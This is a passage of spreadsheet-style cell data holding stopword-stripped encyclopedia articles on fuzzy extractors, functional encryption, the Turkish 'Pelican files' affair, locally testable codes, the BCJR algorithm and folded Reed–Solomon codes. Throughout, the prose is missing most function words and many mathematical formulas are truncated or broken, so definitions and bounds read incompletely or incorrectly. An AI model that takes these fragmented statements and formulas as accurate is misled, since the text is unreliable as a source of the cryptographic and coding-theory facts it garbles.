exceed plotkin bound, limit {\displaystyle n/4} error corrections, approach shannon's bound, allows nearly {\displaystyle n/2} corrections. achieve enhanced error correction, less restrictive error distribution model must used. random errors restrictive model, {\displaystyle _{p}} create {\displaystyle probability {\displaystyle position {\displaystyle received wrong. this model show entropy loss limited {\displaystyle nh(p)-o(n)} {\displaystyle binary entropy function.if min-entropy {\displaystyle m\geq n(h({\frac {1}{2}}-\gamma ))+\varepsilon {\displaystyle n({\frac {1}{2}}-\gamma errors tolerated, constant {\displaystyle \gamma input-dependent errors model, errors known distribution adversary, constraints {\displaystyle dis_{\text{err}}\leq corrupted word depends input {\displaystyle secure sketch. shown error model never {\displaystyle errors, since model account complex noise processes, meaning shannon's bound reached; random permutation prepended secure sketch reduce entropy loss. computationally bounded errors this model differs input-dependent model errors depend input {\displaystyle secure sketch, adversary limited polynomial-time algorithms introducing errors. since algorithms better-than-polynomial-time currently feasible real world, positive result using error model would guarantee errors fixed. this least restrictive model, known approach shannon's bound list-decodable codes, although always useful practice, since returning list, instead single code word, always acceptable. privacy guarantees general, secure system attempts leak little information possible adversary. case biometrics, information biometric reading leaked, adversary able learn personal information user. example, adversary notices certain pattern helper strings implies ethnicity user. consider additional information function {\displaystyle f(w)} adversary learn helper string, must ensured that, data infer data person biometric reading taken. correlation helper string biometric input ideally helper string {\displaystyle would reveal information biometric input {\displaystyle this possible every subsequent biometric reading {\displaystyle identical original {\displaystyle case, actually need helper string; easy generate string correlated {\displaystyle since desirable accept biometric input {\displaystyle similar {\displaystyle helper string {\displaystyle must somehow correlated. different {\displaystyle {\displaystyle allowed correlation {\displaystyle {\displaystyle correlated are, information {\displaystyle reveals {\displaystyle consider information function {\displaystyle f(w)} best possible solution make sure adversary can't learn anything useful helper string. gen(w) probabilistic probabilistic {\displaystyle y()} hides results functions small amount leakage {\displaystyle \epsilon leakage difference probability adversaries guessing function, knows probabilistic not. formally: {\displaystyle |\pr[a_{1}(y(w))=f(w)]-\pr[a_{2}()=f(w)]|\leq \epsilon function {\displaystyle \operatorname {gen} (w)} probabilistic map, even adversary knows helper string {\displaystyle secret string {\displaystyle negligibly likely figure something subject knew nothing. string {\displaystyle supposed kept secret; even leaked (which unlikely)m adversary still figure nothing useful subject, long {\displaystyle \epsilon small. consider {\displaystyle f(w)} correlation biometric input physical characteristic person. setting {\displaystyle y=\operatorname {gen} (w)=r,p} equation changes {\displaystyle |\pr[a_{1}(r,p)=f(w)]-\pr[a_{2}()=f(w)]|\leq \epsilon this means adversary {\displaystyle a_{1}} {\displaystyle (r,p)} second adversary {\displaystyle a_{2}} knows nothing, best guesses {\displaystyle f(w)} {\displaystyle \epsilon apart. uniform fuzzy extractors uniform fuzzy extractors special case fuzzy extractors, output {\displaystyle (r,p)} {\displaystyle gen(w)} negligibly different strings picked uniform distribution, i.e. {\displaystyle (r,p)\approx _{\epsilon }(u_{\ell },u_{|p|})} uniform secure sketches since secure sketches imply fuzzy extractors, constructing uniform secure sketch allows easy construction uniform fuzzy extractor. uniform secure sketch, sketch procedure {\displaystyle ss(w)} randomness extractor {\displaystyle ext(w;i)} {\displaystyle biometric input {\displaystyle random seed. since randomness extractors output string appears uniform distribution, hide information input. applications extractor sketches used construct {\displaystyle (m,t,\epsilon -fuzzy perfectly one-way hash functions. when used hash function input {\displaystyle object want hash. {\displaystyle p,r} {\displaystyle gen(w)} outputs hash value. wanted verify {\displaystyle within {\displaystyle original {\displaystyle would verify {\displaystyle rep(w',p)=r} such fuzzy perfectly one-way hash functions special hash functions accept input {\displaystyle errors, compared traditional hash functions accept input matches original exactly. traditional cryptographic hash functions attempt guarantee computationally infeasible find different inputs hash value. fuzzy perfectly one-way hash functions make analogous claim. they make computationally infeasible find inputs {\displaystyle hamming distance apart hash value. protection active attacks active attack could adversary modify helper string {\displaystyle adversary able change {\displaystyle another string also acceptable reproduce function {\displaystyle rep(w,p)} causes {\displaystyle rep(w,p)} output incorrect secret string {\displaystyle {\tilde {r}}} robust fuzzy extractors solve problem allowing reproduce function fail, modified helper string provided input. robust fuzzy extractors method constructing robust fuzzy extractors hash functions. this construction requires hash functions {\displaystyle h_{1}} {\displaystyle h_{2}} {\displaystyle gen(w)} function produces helper string {\displaystyle appending output secure sketch {\displaystyle s=ss(w)} hash reading {\displaystyle secure sketch {\displaystyle generates secret string {\displaystyle applying second hash function {\displaystyle {\displaystyle formally: {\displaystyle gen(w):s=ss(w),return:p=(s,h_{1}(w,s)),r=h_{2}(w,s)} reproduce function {\displaystyle rep(w,p)} also makes hash functions {\displaystyle h_{1}} {\displaystyle h_{2}} addition verifying biometric input similar enough recovered using {\displaystyle rec(w,s)} function, also verifies hash second part {\displaystyle actually derived {\displaystyle {\displaystyle conditions met, returns {\displaystyle second hash function applied {\displaystyle {\displaystyle formally: {\displaystyle rep(w',{\tilde {p}}):} {\displaystyle {\tilde {s}}} {\displaystyle {\tilde {h}}} {\displaystyle {\tilde {p}};{\tilde {w}}=rec(w',{\tilde {s}}).} {\displaystyle \delta ({\tilde {w}},w')\leq {\displaystyle {\tilde {h}}=h_{1}({\tilde {w}},{\tilde {s}})} {\displaystyle return:h_{2}({\tilde {w}},{\tilde {s}})} else {\displaystyle return:fail} {\displaystyle tampered with, obvious, {\displaystyle rep} fail output high probability. cause algorithm accept different {\displaystyle adversary would find {\displaystyle {\tilde {w}}} {\displaystyle h_{1}(w,s)=h_{1}({\tilde {w}},{\tilde {s}})} since hash function believed one-way functions, computationally infeasible find {\displaystyle {\tilde {w}}} seeing {\displaystyle would provide adversary useful information. since, again, hash function one-way functions, computationally infeasible adversary reverse hash function figure {\displaystyle part {\displaystyle secure sketch, definition sketch reveals negligible information input. similarly seeing {\displaystyle (even though never would provide adversary useful information, adversary able reverse hash function biometric input. references further reading "fuzzy extractors: brief survey results 2004 2006". álvarez, hernández; (2007). "biometric fuzzy extractor scheme iris templates" (pdf). spanish national research council (csic). retrieved march 2022. juels, ari; (2002). fuzzy vault scheme" (pdf). computer science artificial intelligence laboratory (csail). retrieved march 2022. external links "minisketch: optimized library bch-based (pin sketch) reconciliation". github.com. 2021.</t>
  </si>
  <si>
    <t>Functional encryption</t>
  </si>
  <si>
    <t>functional encryption (fe) generalization public-key encryption possessing secret allows learn function ciphertext encrypting. formal definition more precisely, functional encryption scheme given functionality {\displaystyle consists following four algorithms: setup {\displaystyle ({\text{pk}},{\text{msk}})\leftarrow {\textsf {setup}}(1^{\lambda creates public {\displaystyle {\text{pk}}} master secret {\displaystyle {\text{msk}}} keygen {\displaystyle {\text{sk}}\leftarrow {\textsf {keygen}}({\text{msk}},f)} uses master secret generate secret {\displaystyle {\text{sk}}} function {\displaystyle {\displaystyle c\leftarrow {\textsf {enc}}({\text{pk}},x)} uses public encrypt message {\displaystyle {\displaystyle y\leftarrow {\textsf {dec}}({\text{sk}},c)} uses secret calculate {\displaystyle y=f(x)} {\displaystyle value {\displaystyle encrypts.the security requires information adversary learns encryption {\displaystyle revealed {\displaystyle f(x)} formally, defined simulation. applications functional encryption generalizes several existing primitives including identity-based encryption (ibe) attribute-based encryption (abe). case, define {\displaystyle f(k,x)} equal {\displaystyle {\displaystyle corresponds identity allowed decrypt, {\displaystyle \perp otherwise. similarly, case, define {\displaystyle f(k,x)=x} {\displaystyle encodes attributes permission decrypt {\displaystyle \perp otherwise. history functional encryption proposed amit sahai brent waters 2005 formalized boneh, amit sahai brent waters 2010. until recently, however, instantiations functional encryption supported limited function classes boolean formulae. 2012, several researchers developed functional encryption schemes support arbitrary functions. references</t>
  </si>
  <si>
    <t>Pelican files</t>
  </si>
  <si>
    <t>pelican files (turkish: pelikan dosyası) refer unattributed list different items released april 2016 detailing points conflict turkish prime minister ahmet davutoğlu president recep tayyip erdoğan, politicians justice development party turkey assumed respective offices august 2014. released unnamed erdoğan supporters wordpress.com blog, files heavily criticised davutoğlu disobeying erdoğan's political agenda. release files widely attributed sparking events would eventually lead davutoğlu ousted prime minister. name "pelican files" reference 1993 political thriller pelican brief.the files released time relations davutoğlu erdoğan deteriorated sharply. rumours davutoğlu submitted resignation prime minister followed central executive decision committee (mkyk) revoking davutoğlu's right appoint provincial district party representatives. 2016, earlier planned, davutoğlu erdoğan held meeting presidential complex. although initially dubbed 'routine meeting' presidential staff, meeting followed shortly decision hold extraordinary congress 2016 davutoğlu would stand leadership candidate.the publication "memorandum" predicted blogger fuat avni. april 2016 wrote erdoğan planning "coup davutoğlu" "pelican" "berat serhat" reference erdoğan's son-in-law brother) fly. described palace coup d'état turkish social media sources. background justice development party (akp), founded current president former prime minister recep tayyip erdoğan, power ever since winning 2002 general elections landslide. 2014 presidential election, erdoğan akp's candidate elected president 51.79% vote, naming davutoğlu successor party leader prime minister. many commentators claimed davutoğlu would take submissive approach prime minister erdoğan continued pursuing political agenda president, including establishment executive presidency would boost powers. pelican files released april 2016 detailed disagreements erdoğan davutoğlu several issues concerning national inner-party political developments. items items detailed pelican files listed below. erdoğan opposed stopped enacting 'transparency law', piece legislation davutoğlu wanted implement shortly becoming prime minister. davutoğlu allegedly favour four former government ministers, namely egemen bağış, zafer çağlayan, muammer güler erdoğan bayraktar, sent supreme court role 2013 government corruption scandal. members parliament later voted motion send four ministers supreme court erdoğan instructed block motion. davutoğlu responsible parliamentary candidacy hakan fidan, undersecretary national intelligence organisation (turkish: milli istihbarat teşkilatı abbreviated mi̇t) june 2015 general election, overturned erdoğan resulted fidan re-instated undersecretary withdrew candidacy. davutoğlu allowed dolmabahçe statement, result negotiations solution process kurdish rebels, released public. following public criticism erdoğan, important section statement established 'oversight committee' abandoned, followed shortly entire solution process altogether. davutoğlu supported deputy prime minister bülent arınç, publicly criticised erdoğan interfering dolmabahçe statement. relations also allegedly soured davutoğlu giving press statements interviews media news outlets known criticising erdoğan. tensions politicians june elections rose davutoğlu claimed people rejected erdoğan's call executive presidency. alleged davutoğlu supported nationalist movement party (turkish: milliyetçi hareket partisi abbreviated mhp) leader devlet bahçeli june 2015 election resulted hung parliament, claimed mhp's precondition coalition agreement would erdoğan's family (and particular son, bilal erdoğan) trial alleged corruption. general disagreement davutoğlu erdoğan whether pushed coalition agreement early elections inconclusive june 2015 vote also included files. davutoğlu accused establishing media network, including newspaper, would supportive him. davutoğlu also accused censoring pro-erdoğan media material. emerged establishment pro-davutoğlu news outlets would financed undisclosed allowance paid office prime minister directly national budget. alleged davutoğlu erdoğan argued would stand election akp's central executive decision committee (mkyk) party's ordinary congress september 2015. erdoğan supporter binali yıldırım collecting signatures potential leadership davutoğlu backed erdoğan's demands. disagreements davutoğlu's attempts lift political immunities prosecution, well decision consult peoples' democratic party (hdp) proposals resulted tensions erdoğan increase further. erdoğan allegedly strongly protested davutoğlu claiming government could restart solution process kurdistan workers' party (pkk) reverted situation 2013. furthermore, davutoğlu criticised opposing claimed 'everything would alright parallel state (gülen movement) reverted factory values.' davutoğlu allegedly voice criticism european parliament president martin schulz calling erdoğan 'authoritarian' response erdoğan's calls german video criticising censored. similarly, erdoğan blamed davutoğlu speaking presidency schulz claimed davutoğlu, prime minister, would recognised official representative turkish government negotiations european union presidency alleged consulted davutoğlu european migrant crisis negotiations visa-free entry turkish nationals european union. davutoğlu also accused criticising european media outlets voiced scepticism erdoğan. competition davutoğlu erdoğan reported would meet president barack obama official visit united states davutoğlu allegedly attempted recruit akp's notorious social media trolls (known trolls') support erdoğan advisors journalists close davutoğlu accused supporting restarting negotiations pkk. davutoğlu erdoğan allegedly disagreed whether arrested journalists dündar erdem tried custody. davutoğlu invited arınç 'public opening' rally manisa shortly june 2015 vote. davutoğlu's relations erdoğan deteriorated visited taraf newspaper, known critical erdoğan erdoğan allegedly blocked davutoğlu's preferred appointments high-ranking bureaucratic positions. davutoğlu allegedly angered erdoğan claimed 1,100 academics arrested signing resolution calling peace south-east turkey taken custody. aftermath release pelican files seen proof several earlier media reports growing rifts davutoğlu erdoğan, though presidency denied involvement release. early may, akp's central executive decision committee (mkyk) voted revoke leader's ability appoint provincial district party representatives instead delegated power mkyk whole. may, davutoğlu gave speech parliamentary group meeting interpreted press 'resignation speech' short length. rumours emerged davutoğlu submitted resignation presidency earlier. 2016, davutoğlu erdoğan presidential complex, earlier usual thursday weekly meeting. meeting lasted hour minutes, neither presidency prime minister's office made statement, although presidency claimed meeting 'routine'. shortly after, declared davutoğlu would assemble party mkyk making public speech another parliamentary group meeting mps. time, reported party taken decision call extraordinary congress. davutoğlu would stand re-election party leader commentators claimed pro-erdoğan figure would become akp's next leader. also fuat avni references</t>
  </si>
  <si>
    <t>Locally testable code</t>
  </si>
  <si>
    <t>locally testable code type error-correcting code determined string word code looking small (frequently constant) number bits string. situations, useful know data corrupted without decoding appropriate action taken response. example, communication, receiver encounters corrupted code, request data re-sent, could increase accuracy said data. similarly, data storage, codes allow damaged data recovered rewritten properly. contrast, locally decodable codes small number bits codeword probabilistically recover original information. fraction errors determines likely decoder correctly recovers original bit; however, locally decodable codes locally testable.clearly, valid codeword accepted codeword, strings codewords could off, would require many (certainly constant number) probes. account this, testing failure defined string least fraction bits. this implies words code must longer input strings adding redundancy. definition measure distance strings, hamming distance used {\displaystyle \delta (x,y)=|\{i:x_{i}\neq y_{i}\}|} distance string {\displaystyle code {\displaystyle c:\{0,1\}^{k}\to \{0,1\}^{n}} computed {\displaystyle \delta (w,c)=\min _{x}\{\delta (w,c(x))\}} relative distances computed fraction number bits {\displaystyle \delta (x,y)=\delta (x,y)/n{\text{ }}\delta (w,c)=\delta (w,c)/n} code {\displaystyle c:\{0,1\}^{k}\to \{0,1\}^{n}} called {\displaystyle -local {\displaystyle \delta -testable exists turing machine given random access input {\displaystyle makes {\displaystyle non-adaptive queries {\displaystyle satisfies following: {\displaystyle x\in \{0,1\}^{k}} {\displaystyle w=c(x)} {\displaystyle pr[m^{w}(1^{k})=1]=1} words, accepts given access codeword {\displaystyle w\in \{0,1\}^{n}} {\displaystyle \delta (w,c)&gt;\delta {\displaystyle pr[m^{w}(1^{k})=1]\leq 1/2} must reject strings {\displaystyle \delta -far least half time.also rate code ratio message length codeword length {\displaystyle r={\frac {|x|}{|c(x)|}}} limits remains open question whether locally testable codes linear size, several constructions considered "nearly linear": polynomial arbitrarily close linear; {\displaystyle \epsilon {\displaystyle n=k^{1+\epsilon functions form {\displaystyle n=k^{1+\epsilon (k)}} {\displaystyle \epsilon (k)} function tending toward this makes closer linear increases. example: {\displaystyle 1/\log \log {\displaystyle 1/(\log k)^{c}} {\displaystyle c\in (0,1)} {\displaystyle \exp((\log \log \log k)^{c})/\log {\displaystyle c\in (0,1)} these achieved, even constant query complexity binary alphabet, {\displaystyle n=k^{1+1/(\log k)^{c}}} {\displaystyle c\in (0,1)} next nearly linear goal linear polylogarithmic factor; poly {\displaystyle n={\text{poly}}(\log k)*k} nobody come linearly testable code satisfies constraint.in november 2021 preprints reported first polynomial-time construction {\displaystyle c^{3}} -ltcs" namely locally testable codes constant rate {\displaystyle constant distance {\displaystyle \delta constant locality {\displaystyle connection probabilistically checkable proofs locally testable codes common probabilistically checkable proofs (pcps). this apparent similarities construction. both, given {\displaystyle random nonadaptive queries large string want accept, must probability not, must accept half time. major difference pcps interested accepting {\displaystyle exists {\displaystyle {\displaystyle m^{w}(x)=1} locally testable codes, hand, accept {\displaystyle part code. many things wrong assuming proof encodes locally testable code. example, definition says nothing invalid proofs, invalid inputs. despite difference, locally testable codes pcps similar enough frequently construct one, prover construct along way. examples hadamard code famous error-correcting codes, hadamard code, locally testable code. codeword encoded hadamard code linear function {\displaystyle f(y)={\sum _{i}{x_{i}y_{i}}}} (mod this requires listing result function every possible requires exponentially bits input. test string codeword hadamard code, test function encodes linear. this means simply checking {\displaystyle w(x)\oplus w(y)=w(x\oplus uniformly random vectors (where {\displaystyle \oplus denotes bitwise xor). easy valid encoding {\displaystyle equation true, definition linear function. somewhat harder, however, showing string {\displaystyle \delta -far upper bound error terms {\displaystyle \delta bound found direct approach approximating chances exactly three probes yielding incorrect result. events {\displaystyle w(x)} {\displaystyle w(y)} {\displaystyle w(x\oplus incorrect. event exactly occurring. this comes {\displaystyle {\begin{aligned}p(e)&amp;\geq p(a\cup b\cup c)-3*p(a\cup b)\\&amp;\geq 3*p(a)-3*p(a\cup b)-3*p(a\cup b)\\&amp;\geq 3\delta -6\delta ^{2}\end{aligned}}} this works {\displaystyle 0&lt;\delta \leq 5/16} shortly after, {\displaystyle 3\delta -6\delta ^{2}&lt;\delta with additional work, shown error bounded {\displaystyle f(x)={\begin{cases}3\delta -6\delta ^{2}&amp;:0\leq \delta \leq 5/16\\45/128&amp;:5/16\leq \delta \leq 45/128\\\delta &amp;:45/128\leq \delta \leq 1/2\end{cases}}} given {\displaystyle \delta constant chance false positives, simply check constant number times probability 1/2. long code long code another code large blowup close locally testable. given input {\displaystyle 0\leq i\leq 2^{k}} (note, takes {\displaystyle bits represent), function returns {\displaystyle i^{th}} input, {\displaystyle f_{i}(x)=x_{i}} evaluated possible {\displaystyle 2^{k}} -bit inputs {\displaystyle 0\leq x\leq 2^{2^{k}}} codeword concatenation length {\displaystyle n=2^{2^{k}}} locally test errors pick uniformly random input {\displaystyle {\displaystyle y=x} small chance flipping bit, {\displaystyle accept function {\displaystyle codeword {\displaystyle f(x)=f(y)} {\displaystyle codeword, accept {\displaystyle long {\displaystyle x_{i}} unchanged, happens probability {\displaystyle 1-\mu this violates requirement codewords always accepted, good enough needs.other locally testable codes include reed-muller codes (see locally decodable codes decoding algorithm), reed-solomon codes, short code. also gilbert–varshamov bound hamming code expander code references external links "breakthroughs locally testable codes constant rate, distance, locality simons institute theory computing". simons.berkeley.edu. october 2021.{{cite web}}: maint: url-status (link)</t>
  </si>
  <si>
    <t>BCJR algorithm</t>
  </si>
  <si>
    <t>bcjr algorithm algorithm maximum posteriori decoding error correcting codes defined trellises (principally convolutional codes). algorithm named inventors: bahl, cocke, jelinek raviv. this algorithm critical modern iteratively-decoded error-correcting codes including turbo codes low-density parity-check codes. steps involved based trellis: compute forward probabilities {\displaystyle \alpha compute backward probabilities {\displaystyle \beta compute smoothed probabilities based information (i.e. noise variance awgn, crossover probability binary symmetric channel) variations sbgt bcjr berrou, glavieux thitimajshima simplification. log-map bcjr implementations susa framework implements bcjr algorithm forward error correction codes channel equalization c++. also forward-backward algorithm maximum posteriori (map) estimation hidden markov model references external links online textbook: information theory, inference, learning algorithms, david j.c. mackay, discusses bcjr algorithm chapter implementation bcjr algorithm susa signal processing framework</t>
  </si>
  <si>
    <t>Folded Reed–Solomon code</t>
  </si>
  <si>
    <t>coding theory, folded reed–solomon codes like reed–solomon codes, obtained mapping {\displaystyle reed–solomon codewords larger alphabet careful bundling codeword symbols. folded reed–solomon codes also special case parvaresh–vardy codes. using optimal parameters decode rate achieve decoding radius term "folded reed–solomon codes" coined paper v.y. krachkovsky algorithm presented reed–solomon codes many random "phased burst" errors [1]. list-decoding algorithm folded codes corrects beyond {\displaystyle 1-{\sqrt {r}}} bound reed–solomon codes achieved guruswami–sudan algorithm phased burst errors. history ongoing challenges coding theory error correcting codes achieve optimal trade-off (coding) rate error-correction radius. though possible achieve practically (due noisy channel coding theory issues), quasi optimal tradeoffs achieved theoretically. prior folded reed–solomon codes devised, best error-correction radius achieved {\displaystyle 1-{\sqrt {r}}} reed–solomon codes rates {\displaystyle improvement upon {\displaystyle 1-{\sqrt {r}}} bound achieved parvaresh vardy rates {\displaystyle r&lt;{\tfrac {1}{16}}.} {\displaystyle r\to parvaresh–vardy algorithm decode fraction {\displaystyle 1-o(r\log(1/r))} errors. folded reed–solomon codes improve previous constructions, list decoded polynomial time fraction {\displaystyle (1-r-\varepsilon errors constant {\displaystyle \varepsilon definition {\displaystyle f(x)\mapsto {\begin{bmatrix}f(1)\\f(\gamma )\\\vdots \\f(\gamma ^{m-1})\end{bmatrix}},{\begin{bmatrix}f(\gamma ^{m})\\f(\gamma ^{m+1})\\\vdots \\f(\gamma ^{2m-1})\end{bmatrix}},\ldots ,{\begin{bmatrix}f(\gamma ^{n-m})\\f(\gamma ^{n-m+1})\\\vdots \\f(\gamma ^{n-1})\end{bmatrix}}} consider reed–solomon {\displaystyle [n=q-1,k]_{q}} code length {\displaystyle dimension {\displaystyle folding parameter {\displaystyle m\geq assume {\displaystyle divides {\displaystyle mapping reed–solomon codes like this: {\displaystyle f\mapsto \left\langle f(1),f\left(\gamma ^{1}\right),f\left(\gamma ^{2}\right),\ldots ,f\left(\gamma ^{n-1}\right)\right\rangle {\displaystyle \gamma \mathbb _{q}} primitive element {\displaystyle \mathbb _{q}=\left\{0,1,\gamma ,\gamma ^{2},\ldots ,\gamma ^{n-1}\right\}} .the {\displaystyle folded version reed solomon code {\displaystyle denoted {\displaystyle frs_{\mathbb ,\gamma ,m,k}} code block length {\displaystyle n=n/m} {\displaystyle \mathbb ^{m}} {\displaystyle frs_{\mathbb ,\gamma ,m,k}} {\displaystyle [q-1,k]} reed solomon codes {\displaystyle consecutive symbols codewords grouped together. graphic description definition made clear means diagram {\displaystyle m=3} {\displaystyle folding parameter. message denoted {\displaystyle f(x)} encoded using reed–solomon encoding, consists values {\displaystyle {\displaystyle x_{0},x_{1},x_{2},\ldots ,x_{n-1}} {\displaystyle x_{i}=\gamma ^{i}} then bundling performed groups elements, give codeword length {\displaystyle n/3} alphabet {\displaystyle \mathbb _{q}^{3}} something observed folding operation demonstrated change rate {\displaystyle original reed–solomon code. prove this, consider linear {\displaystyle [n,k,d]_{q}} code, length {\displaystyle dimension {\displaystyle distance {\displaystyle {\displaystyle folding operation make {\displaystyle \left[{\tfrac {n}{m}},{\tfrac {k}{m}},{\tfrac {d}{m}}\right]_{q^{m}}} code. this, rate {\displaystyle r={\tfrac {k}{n}}} same. folded reed–solomon codes singleton bound according asymptotic version singleton bound, known relative distance {\displaystyle \delta code must satisfy {\displaystyle r\leqslant 1-\delta +o(1)} {\displaystyle rate code. proved earlier, since rate {\displaystyle maintained, relative distance {\displaystyle \delta \leqslant 1-r} also meets singleton bound. folding might help? folded reed–solomon codes basically reed solomon codes, viewed larger alphabet. show might help, consider folded reed–solomon code {\displaystyle m=3} decoding reed–solomon code folded reed–solomon code fraction errors {\displaystyle \rho tasks almost computational intensity: unfold received word folded reed–solomon code, treat received word original reed–solomon code, reed–solomon list decoding algorithm obviously, list contain folded reed–solomon codewords within distance {\displaystyle \rho received word, along extras, expurgate. also, decoding folded reed–solomon code easier task. suppose want correct third errors. decoding algorithm chosen must correct error pattern corrects every third symbol reed–solomon encoding. folding, error pattern corrupt symbols {\displaystyle \mathbb _{q}^{3}} eliminate need error correction. this propagation errors indicated blue color graphical description. this proves fixed fraction errors {\displaystyle \rho folding operation reduces channel's flexibility distribute errors, turn leads reduction number error patterns need corrected. folded reed–solomon (frs) codes parvaresh vardy (pv) codes related relate folded reed solomon codes parvaresh vardy codes encodes polynomial {\displaystyle degree {\displaystyle polynomials {\displaystyle f_{0}=f,f_{1},\ldots ,f_{s-1}(s\geqslant {\displaystyle f_{i}(x)=f_{i-1}(x)^{d}\mod e(x)} {\displaystyle e(x)} irreducible polynomial. while choosing irreducible polynomial {\displaystyle e(x)=x^{q}-\gamma parameter {\displaystyle check every polynomial {\displaystyle degree {\displaystyle satisfies {\displaystyle f(\gamma x)=f(x)^{d}\mod e(x)} since {\displaystyle f(\gamma shifted counterpart {\displaystyle f(x)} {\displaystyle \gamma primitive element {\displaystyle \mathbb _{q}.} thus folded code bundling together code symbols code order {\displaystyle s=m} evaluation points {\displaystyle \left\{1,\gamma ,\gamma ^{2m},\ldots ,\gamma ^{\left({\frac {n}{m}}-1\right)m}\right\}} compare folded code code order evaluation points {\displaystyle \left\{1,\gamma ,\ldots ,\gamma ^{m-2},\gamma ^{m},\gamma ^{m+1},\ldots ,\gamma ^{2m-2},\ldots ,\gamma ^{n-m},\gamma ^{n-m+1},\ldots ,\gamma ^{n-2}\right\}} encoding {\displaystyle every {\displaystyle 0\leq i\leq n/m-1} every {\displaystyle 0&lt;j&lt;m-1,f(\gamma ^{mi+j})} appears {\displaystyle f(\gamma ^{mi+j})} {\displaystyle f_{1}(\gamma ^{-1}\gamma ^{mi+j})} unlike folded encoding appears once. thus, folded codes information rate bigger factor {\displaystyle 2(m-1)/m} hence list decoding radius trade-off better folded code using list decodability codes. plus point choosing code compressed forms suitable code similar error correction performance better rate corresponding code. idea construct folded codes rate {\displaystyle list decodable radius approximately {\displaystyle 1-r^{s/[s+1]}} {\displaystyle s\geq brief overview list-decoding folded reed–solomon codes list decoding algorithm runs quadratic time decode code radius {\displaystyle 1-r-\varepsilon presented guruswami. algorithm essentially three steps namely interpolation step welch berlekamp style interpolation used interpolate non-zero polynomial {\displaystyle q(x,y_{1},y_{2},\ldots ,y_{s})=a_{0}(x)+a_{1}(x)y_{1}+a_{2}(x)y_{2}+\cdots +a_{s}(x)y_{s},} polynomials {\displaystyle f\in \mathbb _{q}[x]} degree {\displaystyle k-1} satisfying equation derived interpolation found. third step actual list close-by codewords known pruning solution subspace takes {\displaystyle q^{s}} time. linear-algebraic list decoding algorithm guruswami presents {\displaystyle n^{\omega (1/\varepsilon ^{2})}} time list decoding algorithm based linear-algebra, decode folded reed–solomon code radius {\displaystyle 1-r-\varepsilon list-size {\displaystyle {n^{o(1/\varepsilon ^{2})}}} there three steps algorithm: interpolation step, root finding step prune step. interpolation step find candidate message polynomial {\displaystyle f(x)} solving linear system. root finding step, find solution subspace solving another linear system. last step prune solution subspace gained second step. introduce step details following. step interpolation step welch–berlekamp-style interpolation (because viewed higher-dimensional generalization welch–berlekamp algorithm). suppose received codeword {\displaystyle {\displaystyle -folded reed–solomon code shown {\displaystyle \left({\begin{bmatrix}y_{0}\\y_{1}\\y_{2}\\\cdots \\y_{m-1}\end{bmatrix}},{\begin{bmatrix}y_{m}\\y_{m+1}\\y_{m+2}\\\cdots \\y_{2m-1}\end{bmatrix}},\ldots ,{\begin{bmatrix}y_{n-m}\\y_{n-m+1}\\y_{n-m+2}\\\cdots \\y_{n-1}\end{bmatrix}}\right)} interpolate nonzero polynomial {\displaystyle q(x,y_{1},\ldots ,y_{s})=a_{0}(x)+a_{1}(x)y_{1}+\cdots +a_{s}(x)y_{s},\qquad {\begin{cases}\deg(a_{i})\leqslant d&amp;1\leqslant i\leqslant s\\\deg(a_{0})\leqslant d+k-1&amp;\end{cases}}} using carefully chosen degree parameter {\displaystyle {\displaystyle d=\left\lfloor {\frac {n(m-s+1)-k+1}{s+1}}\right\rfloor interpolation requirements {\displaystyle q\left(\gamma ^{im+j},y_{im+j},y_{im+j+1},\ldots ,y_{im+j+s-1}\right)=0,\quad {\text{for}}\quad i=0,1,\ldots ,{\tfrac {n}{m}}-1,j=0,1,\ldots ,m-s.} then number monomials {\displaystyle q(x,y_{1},\ldots ,y_{s})} {\displaystyle (d+1)s+d+k=(d+1)(s+1)+k-1&gt;n(m-s+1)} because number monomials {\displaystyle q(x,y_{1},\ldots ,y_{s})} greater number interpolation conditions. lemma lemma {\displaystyle 0\neq q\in \mathbb _{q}[x,y_{1},\ldots ,y_{s}]} satisfying interpolation condition found solving homogeneous linear system {\displaystyle \mathbb _{q}} {\displaystyle constraints variables. moreover interpolation performed {\displaystyle o(nm\log ^{2}(nm)\log \log(nm))} operations {\displaystyle \mathbb _{q}} .this lemma shows interpolation step done near-linear time. now, talked everything need multivariate polynomial {\displaystyle q(x,y_{1},\ldots ,y_{s})} remaining task focus message polynomials {\displaystyle f(x)} lemma candidate message polynomial {\displaystyle f(x)\in \mathbb [x]} polynomial degree {\displaystyle k-1} whose folded reed-solomon encoding agrees received word {\displaystyle least {\displaystyle columns {\displaystyle t&gt;{{d+k-1} \over {m-s+1}},} {\displaystyle q(x,f(x),f(\gamma x),\ldots ,f(\gamma _{s-1}x))=0.} here "agree" means {\displaystyle values column match corresponding values codeword {\displaystyle this lemma shows polynomial {\displaystyle q(x,y_{1},\ldots ,y_{s})} presents algebraic condition must satisfied message polynomials {\displaystyle f(x)} interested list decoding. combining lemma parameter {\displaystyle {\displaystyle t(m-s+1)&gt;{\frac {n(m-s+1)+s(k-1)}{s+1}}} further decoding bound {\displaystyle t\geqslant {\frac {n}{s+1}}+{\frac {s}{s+1}}\cdot {\frac {k}{m-s+1}}=n\left({\frac {1}{s+1}}+{\frac {s}{s+1}}\cdot {\frac {mr}{m-s+1}}\right)} notice fractional agreement {\displaystyle {\dfrac {1}{s+1}}+{\dfrac {s}{s+1}}\cdot {\dfrac {mr}{m-s+1}}} step root-finding step during step, task focus find polynomials {\displaystyle f\in {\mathbb _{q}[x]}} degree {\displaystyle k-1} satisfy equation step namely {\displaystyle a_{0}(x)+a_{1}(x)f(x)+a_{2}(x)f(\gamma x)+\cdots +a_{s}(x)f(\gamma ^{s-1}x)=0} since equation forms linear system equations {\displaystyle \mathbb _{q}} coefficients {\displaystyle f_{0},f_{1},\ldots ,f_{k-1}} polynomial {\displaystyle f(x)=f_{0}+f_{1}x+\cdots +f_{k-1}x^{k-1},} solutions equation affine subspace {\displaystyle \mathbb _{q}^{k}} this fact point gives rise efficient algorithm solve linear system. natural large dimension solution? upper bound dimension? having upper bound important constructing efficient list decoding algorithm simply output codewords given decoding problem. actually indeed upper bound lemma argues. lemma order {\displaystyle \gamma least {\displaystyle particular {\displaystyle \gamma primitive), dimension solution {\displaystyle s-1} .this lemma shows upper bound dimension solution space. finally, based analysis, theorem theorem folded reed–solomon code {\displaystyle frs_{q}^{(m)}[n,k]} block length {\displaystyle n={\tfrac {n}{m}}} rate {\displaystyle r={\tfrac {k}{n}},} following holds integers {\displaystyle s,1\leqslant s\leqslant given received word {\displaystyle y\in (\mathbb _{q}^{m})^{n}} {\displaystyle o((nm\log q)^{2})} time, find basis subspace dimension {\displaystyle s-1} contains message polynomials {\displaystyle 